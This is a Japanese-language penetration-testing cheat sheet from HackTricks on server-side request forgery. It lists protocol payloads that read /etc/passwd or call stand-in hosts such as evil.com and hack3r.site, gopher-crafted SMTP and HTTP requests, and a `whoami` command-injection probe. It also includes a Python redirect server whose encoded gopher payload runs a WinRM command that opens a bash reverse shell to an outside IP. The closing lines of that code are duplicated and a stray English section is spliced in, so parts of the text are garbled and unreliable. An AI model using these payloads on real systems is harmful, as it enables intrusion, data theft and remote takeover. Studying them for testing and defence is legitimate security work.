hacktricks/pentesting-web/ssrf-server-side-request-forgery
2023-10-26 14:42:37 +00:00
..
cloud-ssrf.md Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2023-09-03 01:45:18 +00:00
README.md Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2023-09-28 20:14:46 +00:00
ssrf-vulnerable-platforms.md Translated ['mobile-pentesting/android-app-pentesting/frida-tutorial/owa 2023-10-26 14:42:37 +00:00
url-format-bypass.md Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2023-09-03 01:45:18 +00:00

SSRFサーバーサイドリクエストフォージェリ


Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サーバーサイドリクエストフォージェリSSRFは、攻撃者が選択した任意のドメインに対してサーバーサイドアプリケーションにHTTPリクエストを行わせることができるウェブセキュリティの脆弱性ですここから)。

SSRFのキャプチャ

最初に行う必要があるのは、自分が引き起こしたSSRFインタラクションをキャプチャすることです。HTTPまたはDNSのインタラクションをキャプチャするには、次のようなツールを使用できます。

ホワイトリストされたドメインのバイパス

通常、SSRFは特定のホワイトリストされたドメインまたはURLでのみ機能することがわかります。次のページでは、そのホワイトリストをバイパスするためのテクニックのコンパイルがあります:

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

オープンリダイレクトを介したバイパス

サーバーが正しく保護されている場合、ウェブページ内のオープンリダイレクトを悪用することで、すべての制限をバイパスすることができます。ウェブページは同じドメインへのSSRFを許可し、おそらくリダイレクトをたどるため、オープンリダイレクトを悪用してサーバーが内部のリソースにアクセスすることができます。
詳細はこちら:https://portswigger.net/web-security/ssrf

プロトコル

file://

file:///etc/passwd

dict://

DICT URLスキームは、DICTプロトコルを使用して利用可能な定義や単語リストを参照するために使用されます。

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

SFTP://

セキュアシェル上での安全なファイル転送に使用されるネットワークプロトコルです。

ssrf.php?url=sftp://evil.com:11111/

TFTP://

Trivial File Transfer ProtocolTFTPは、UDP上で動作します。

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

LDAP://

Lightweight Directory Access Protocol軽量ディレクトリアクセスプロトコル。IPネットワーク上で使用されるアプリケーションプロトコルで、分散ディレクトリ情報サービスの管理とアクセスに使用されます。

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

Gopher://

このプロトコルを使用すると、IP、ポート、バイトを指定してサーバーに送信することができます。その後、基本的にはSSRFを利用して任意のTCPサーバーと通信することができます(ただし、まずサービスとの通信方法を知る必要があります)。 幸いなことに、Gopherusを使用して、複数のサービスに対してペイロードを作成することができます。さらに、remote-method-guesserを使用して、Java RMI サービス向けの_gopher_ ペイロードを作成することもできます。

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

Gopher HTTP is a technique used in server-side request forgery (SSRF) attacks. SSRF is a vulnerability that allows an attacker to make requests from the targeted server to other internal or external resources. Gopher HTTP takes advantage of the Gopher protocol, which is a simple protocol used for retrieving documents over the Internet.

In a Gopher HTTP attack, the attacker crafts a malicious request that tricks the server into making a request to a specified URL using the Gopher protocol. This can be used to bypass restrictions and access resources that are not directly accessible from the attacker's perspective.

To perform a Gopher HTTP attack, the attacker typically needs to find a vulnerable parameter that accepts URLs and is susceptible to SSRF. The attacker then crafts a URL using the Gopher protocol and includes the desired request within it. The server, unaware of the malicious intent, makes the request and returns the response to the attacker.

Gopher HTTP attacks can be used to access internal resources, such as databases, internal APIs, or even metadata endpoints. They can also be used to perform port scanning or to bypass network restrictions by making requests to external resources.

To protect against Gopher HTTP attacks, it is important to validate and sanitize user input, especially when it involves URLs or parameters that can be used for SSRF. Additionally, network-level protections, such as firewalls or web application firewalls, can help detect and block malicious requests.

Overall, Gopher HTTP is a powerful technique that can be used in SSRF attacks to bypass restrictions and access resources that would otherwise be inaccessible. It is important for developers and security professionals to be aware of this technique and take appropriate measures to mitigate the risk.

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — 1337にバックコネクトする

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

SMTP

https://twitter.com/har1sec/status/1182255952055164929から:
1. SSRFでsmtpのlocalhost:25に接続する
2. 最初の行から内部ドメイン名を取得する 220 http://blabla.internaldomain.com ESMTP Sendmail
3. http://internaldomain.comをGitHubで検索し、サブドメインを見つける
4. 接続する

Curl URL globbing - WAF bypass

もしSSRFがcurlによって実行される場合、curlにはWAFをバイパスするのに役立つ URL globbingという機能があります。例えば、このwriteupでは、fileプロトコルを介したパストラバーサルの例があります。

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

SSRFリクエストのキャプチャ

リファラーヘッダーを使用したSSRF

一部のアプリケーションでは、訪問者を追跡するためのサーバーサイドの分析ソフトウェアが使用されています。このソフトウェアは、リファラーヘッダーをリクエストに記録することがあります。これは、受信リンクの分析に特に興味があるためです。通常、分析ソフトウェアは、リファラーヘッダーに表示されるサードパーティのURLを実際に訪問します。これは、受信リンクで使用されるアンカーテキストを含む参照サイトの内容を分析するために行われます。その結果、リファラーヘッダーはしばしばSSRFの脆弱性の攻撃対象となります。
このような「隠れた」脆弱性を発見するために、Burpのプラグイン「Collaborator Everywhere」を使用することができます。

証明書からのSNIデータを使用したSSRF

任意のバックエンドに接続するための最も単純な設定ミスは、次のようになります:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

ここでは、SNIフィールドの値がバックエンドのアドレスとして直接使用されています。

この安全でない設定では、SSRF脆弱性を簡単に悪用することができます。SNIフィールドに希望するIPアドレスまたはドメイン名を指定するだけで、Nginxを_internal.host.com_に接続させることができます。例えば、以下のコマンドを使用します。

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf

Wgetファイルのアップロード

コマンドインジェクションを伴うSSRF

次のようなペイロードを試してみる価値があります: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFのレンダリング

ウェブページが提供した情報で自動的にPDFを作成している場合、PDF作成時にサーバー自体で実行されるJSを挿入することができます。これにより、SSRFを悪用することができます。ここで詳細情報を見つけることができます.

SSRFからDoSへ

複数のセッションを作成し、セッションからSSRFを悪用して重いファイルをダウンロードしようとしてください。

SSRF PHP関数

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

GopherへのSSRFリダイレクト

一部の攻撃では、リダイレクトレスポンスを送信する必要がある場合がありますおそらくgopherのような異なるプロトコルを使用するため。以下に、リダイレクトを返すための異なるPythonコードがあります:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)

self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)


Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

DNS Rebidding CORS/SOPバイパス

CORS/SOPの制限をバイパスするために、ローカルIPからコンテンツを外部に流出させるのに問題がある場合、DNS Rebiddingを使用できます。

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

自動DNS Rebidding

Singularity of Originは、DNS rebinding攻撃を実行するためのツールです。このツールには、攻撃サーバーのDNS名のIPアドレスをターゲットマシンのIPアドレスに再バインドし、ターゲットマシン上の脆弱なソフトウェアを悪用するための攻撃ペイロードを提供するために必要なコンポーネントが含まれています。

また、http://rebind.it/singularity.htmlで公開されているサーバーもチェックしてください。

DNS Rebidding + TLSセッションID/セッションチケット

要件:

  • SSRF
  • アウトバウンドTLSセッション
  • ローカルポート上のもの

攻撃手順:

  1. ユーザー/ボットに攻撃者が制御するドメインにアクセスさせます。
  2. DNSTTL0秒ですしたがって、被害者はドメインのIPをすぐに再度チェックします
  3. 被害者と攻撃者のドメイン間でTLS接続が作成されます。攻撃者はセッションIDまたはセッションチケット内にペイロードを挿入します。
  4. ドメイン自身に対して無限ループのリダイレクトを開始します。これの目的は、ユーザー/ボットがドメインにアクセスし続け、ドメインのDNSリクエストを再度実行することです。
  5. DNSリクエストでプライベートIPアドレス現在指定されます127.0.0.1)。
  6. ユーザー/ボットはTLS接続を再確立しようとし、そのためにセッションID/チケットIDを送信します(攻撃者のペイロードが含まれていた場所)。おめでとうございます、ユーザー/ボットが自身を攻撃するように要求することに成功しました。

この攻撃中、localhost:11211memcacheを攻撃する場合、被害者に最初の接続をwww.attacker.com:11211ポートは常に同じである必要があります)で確立させる必要があります。
この攻撃を実行するためには、次のツールを使用できます:https://github.com/jmdx/TLS-poison/
この攻撃についての詳細は、次のトークを参照してください:https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

盲目のSSRFと非盲目のSSRFの違いは、盲目の場合にSSRFリクエストの応答を見ることができないことです。そのため、既知の脆弱性のみを悪用することができるため、悪用がより困難になります。

時間ベースのSSRF

サーバーからの応答の時間をチェックすることで、リソースが存在するかどうかを判断することができるかもしれません(存在するリソースにアクセスするのに存在しないリソースよりも時間がかかる場合があるかもしれません)。

Cloud SSRF Exploitation

クラウド環境内で実行されているマシンでSSRFの脆弱性を見つけた場合、クラウド環境に関する興味深い情報や資格情報を入手することができるかもしれません。

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

SSRFの脆弱なプラットフォーム

いくつかの既知のプラットフォームには、SSRFの脆弱性が含まれているか、含まれていたことがあります。詳細は次を参照してください。

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

ツール

SSRFMap

SSRFの脆弱性を検出および悪用するためのツール

Gopherus

このツールは、次のためのGopherペイロードを生成します

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

_remote-method-guesser_は、一般的なJava RMIの脆弱性に対して攻撃操作をサポートするJava RMIの脆弱性スキャナです。ほとんどの操作は、リクエストされた操作に対してSSRFペイロードを生成するための--ssrfオプションをサポートしています。--gopherオプションと一緒に使用すると、直接使用できるgopherペイロードが生成されます。

SSRF Proxy

SSRFに対して脆弱なサーバーを介してクライアントのHTTPトラフィックをトンネリングするために設計されたマルチスレッドのHTTPプロキシサーバー。

練習するために

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

参考文献


Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスを取得:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}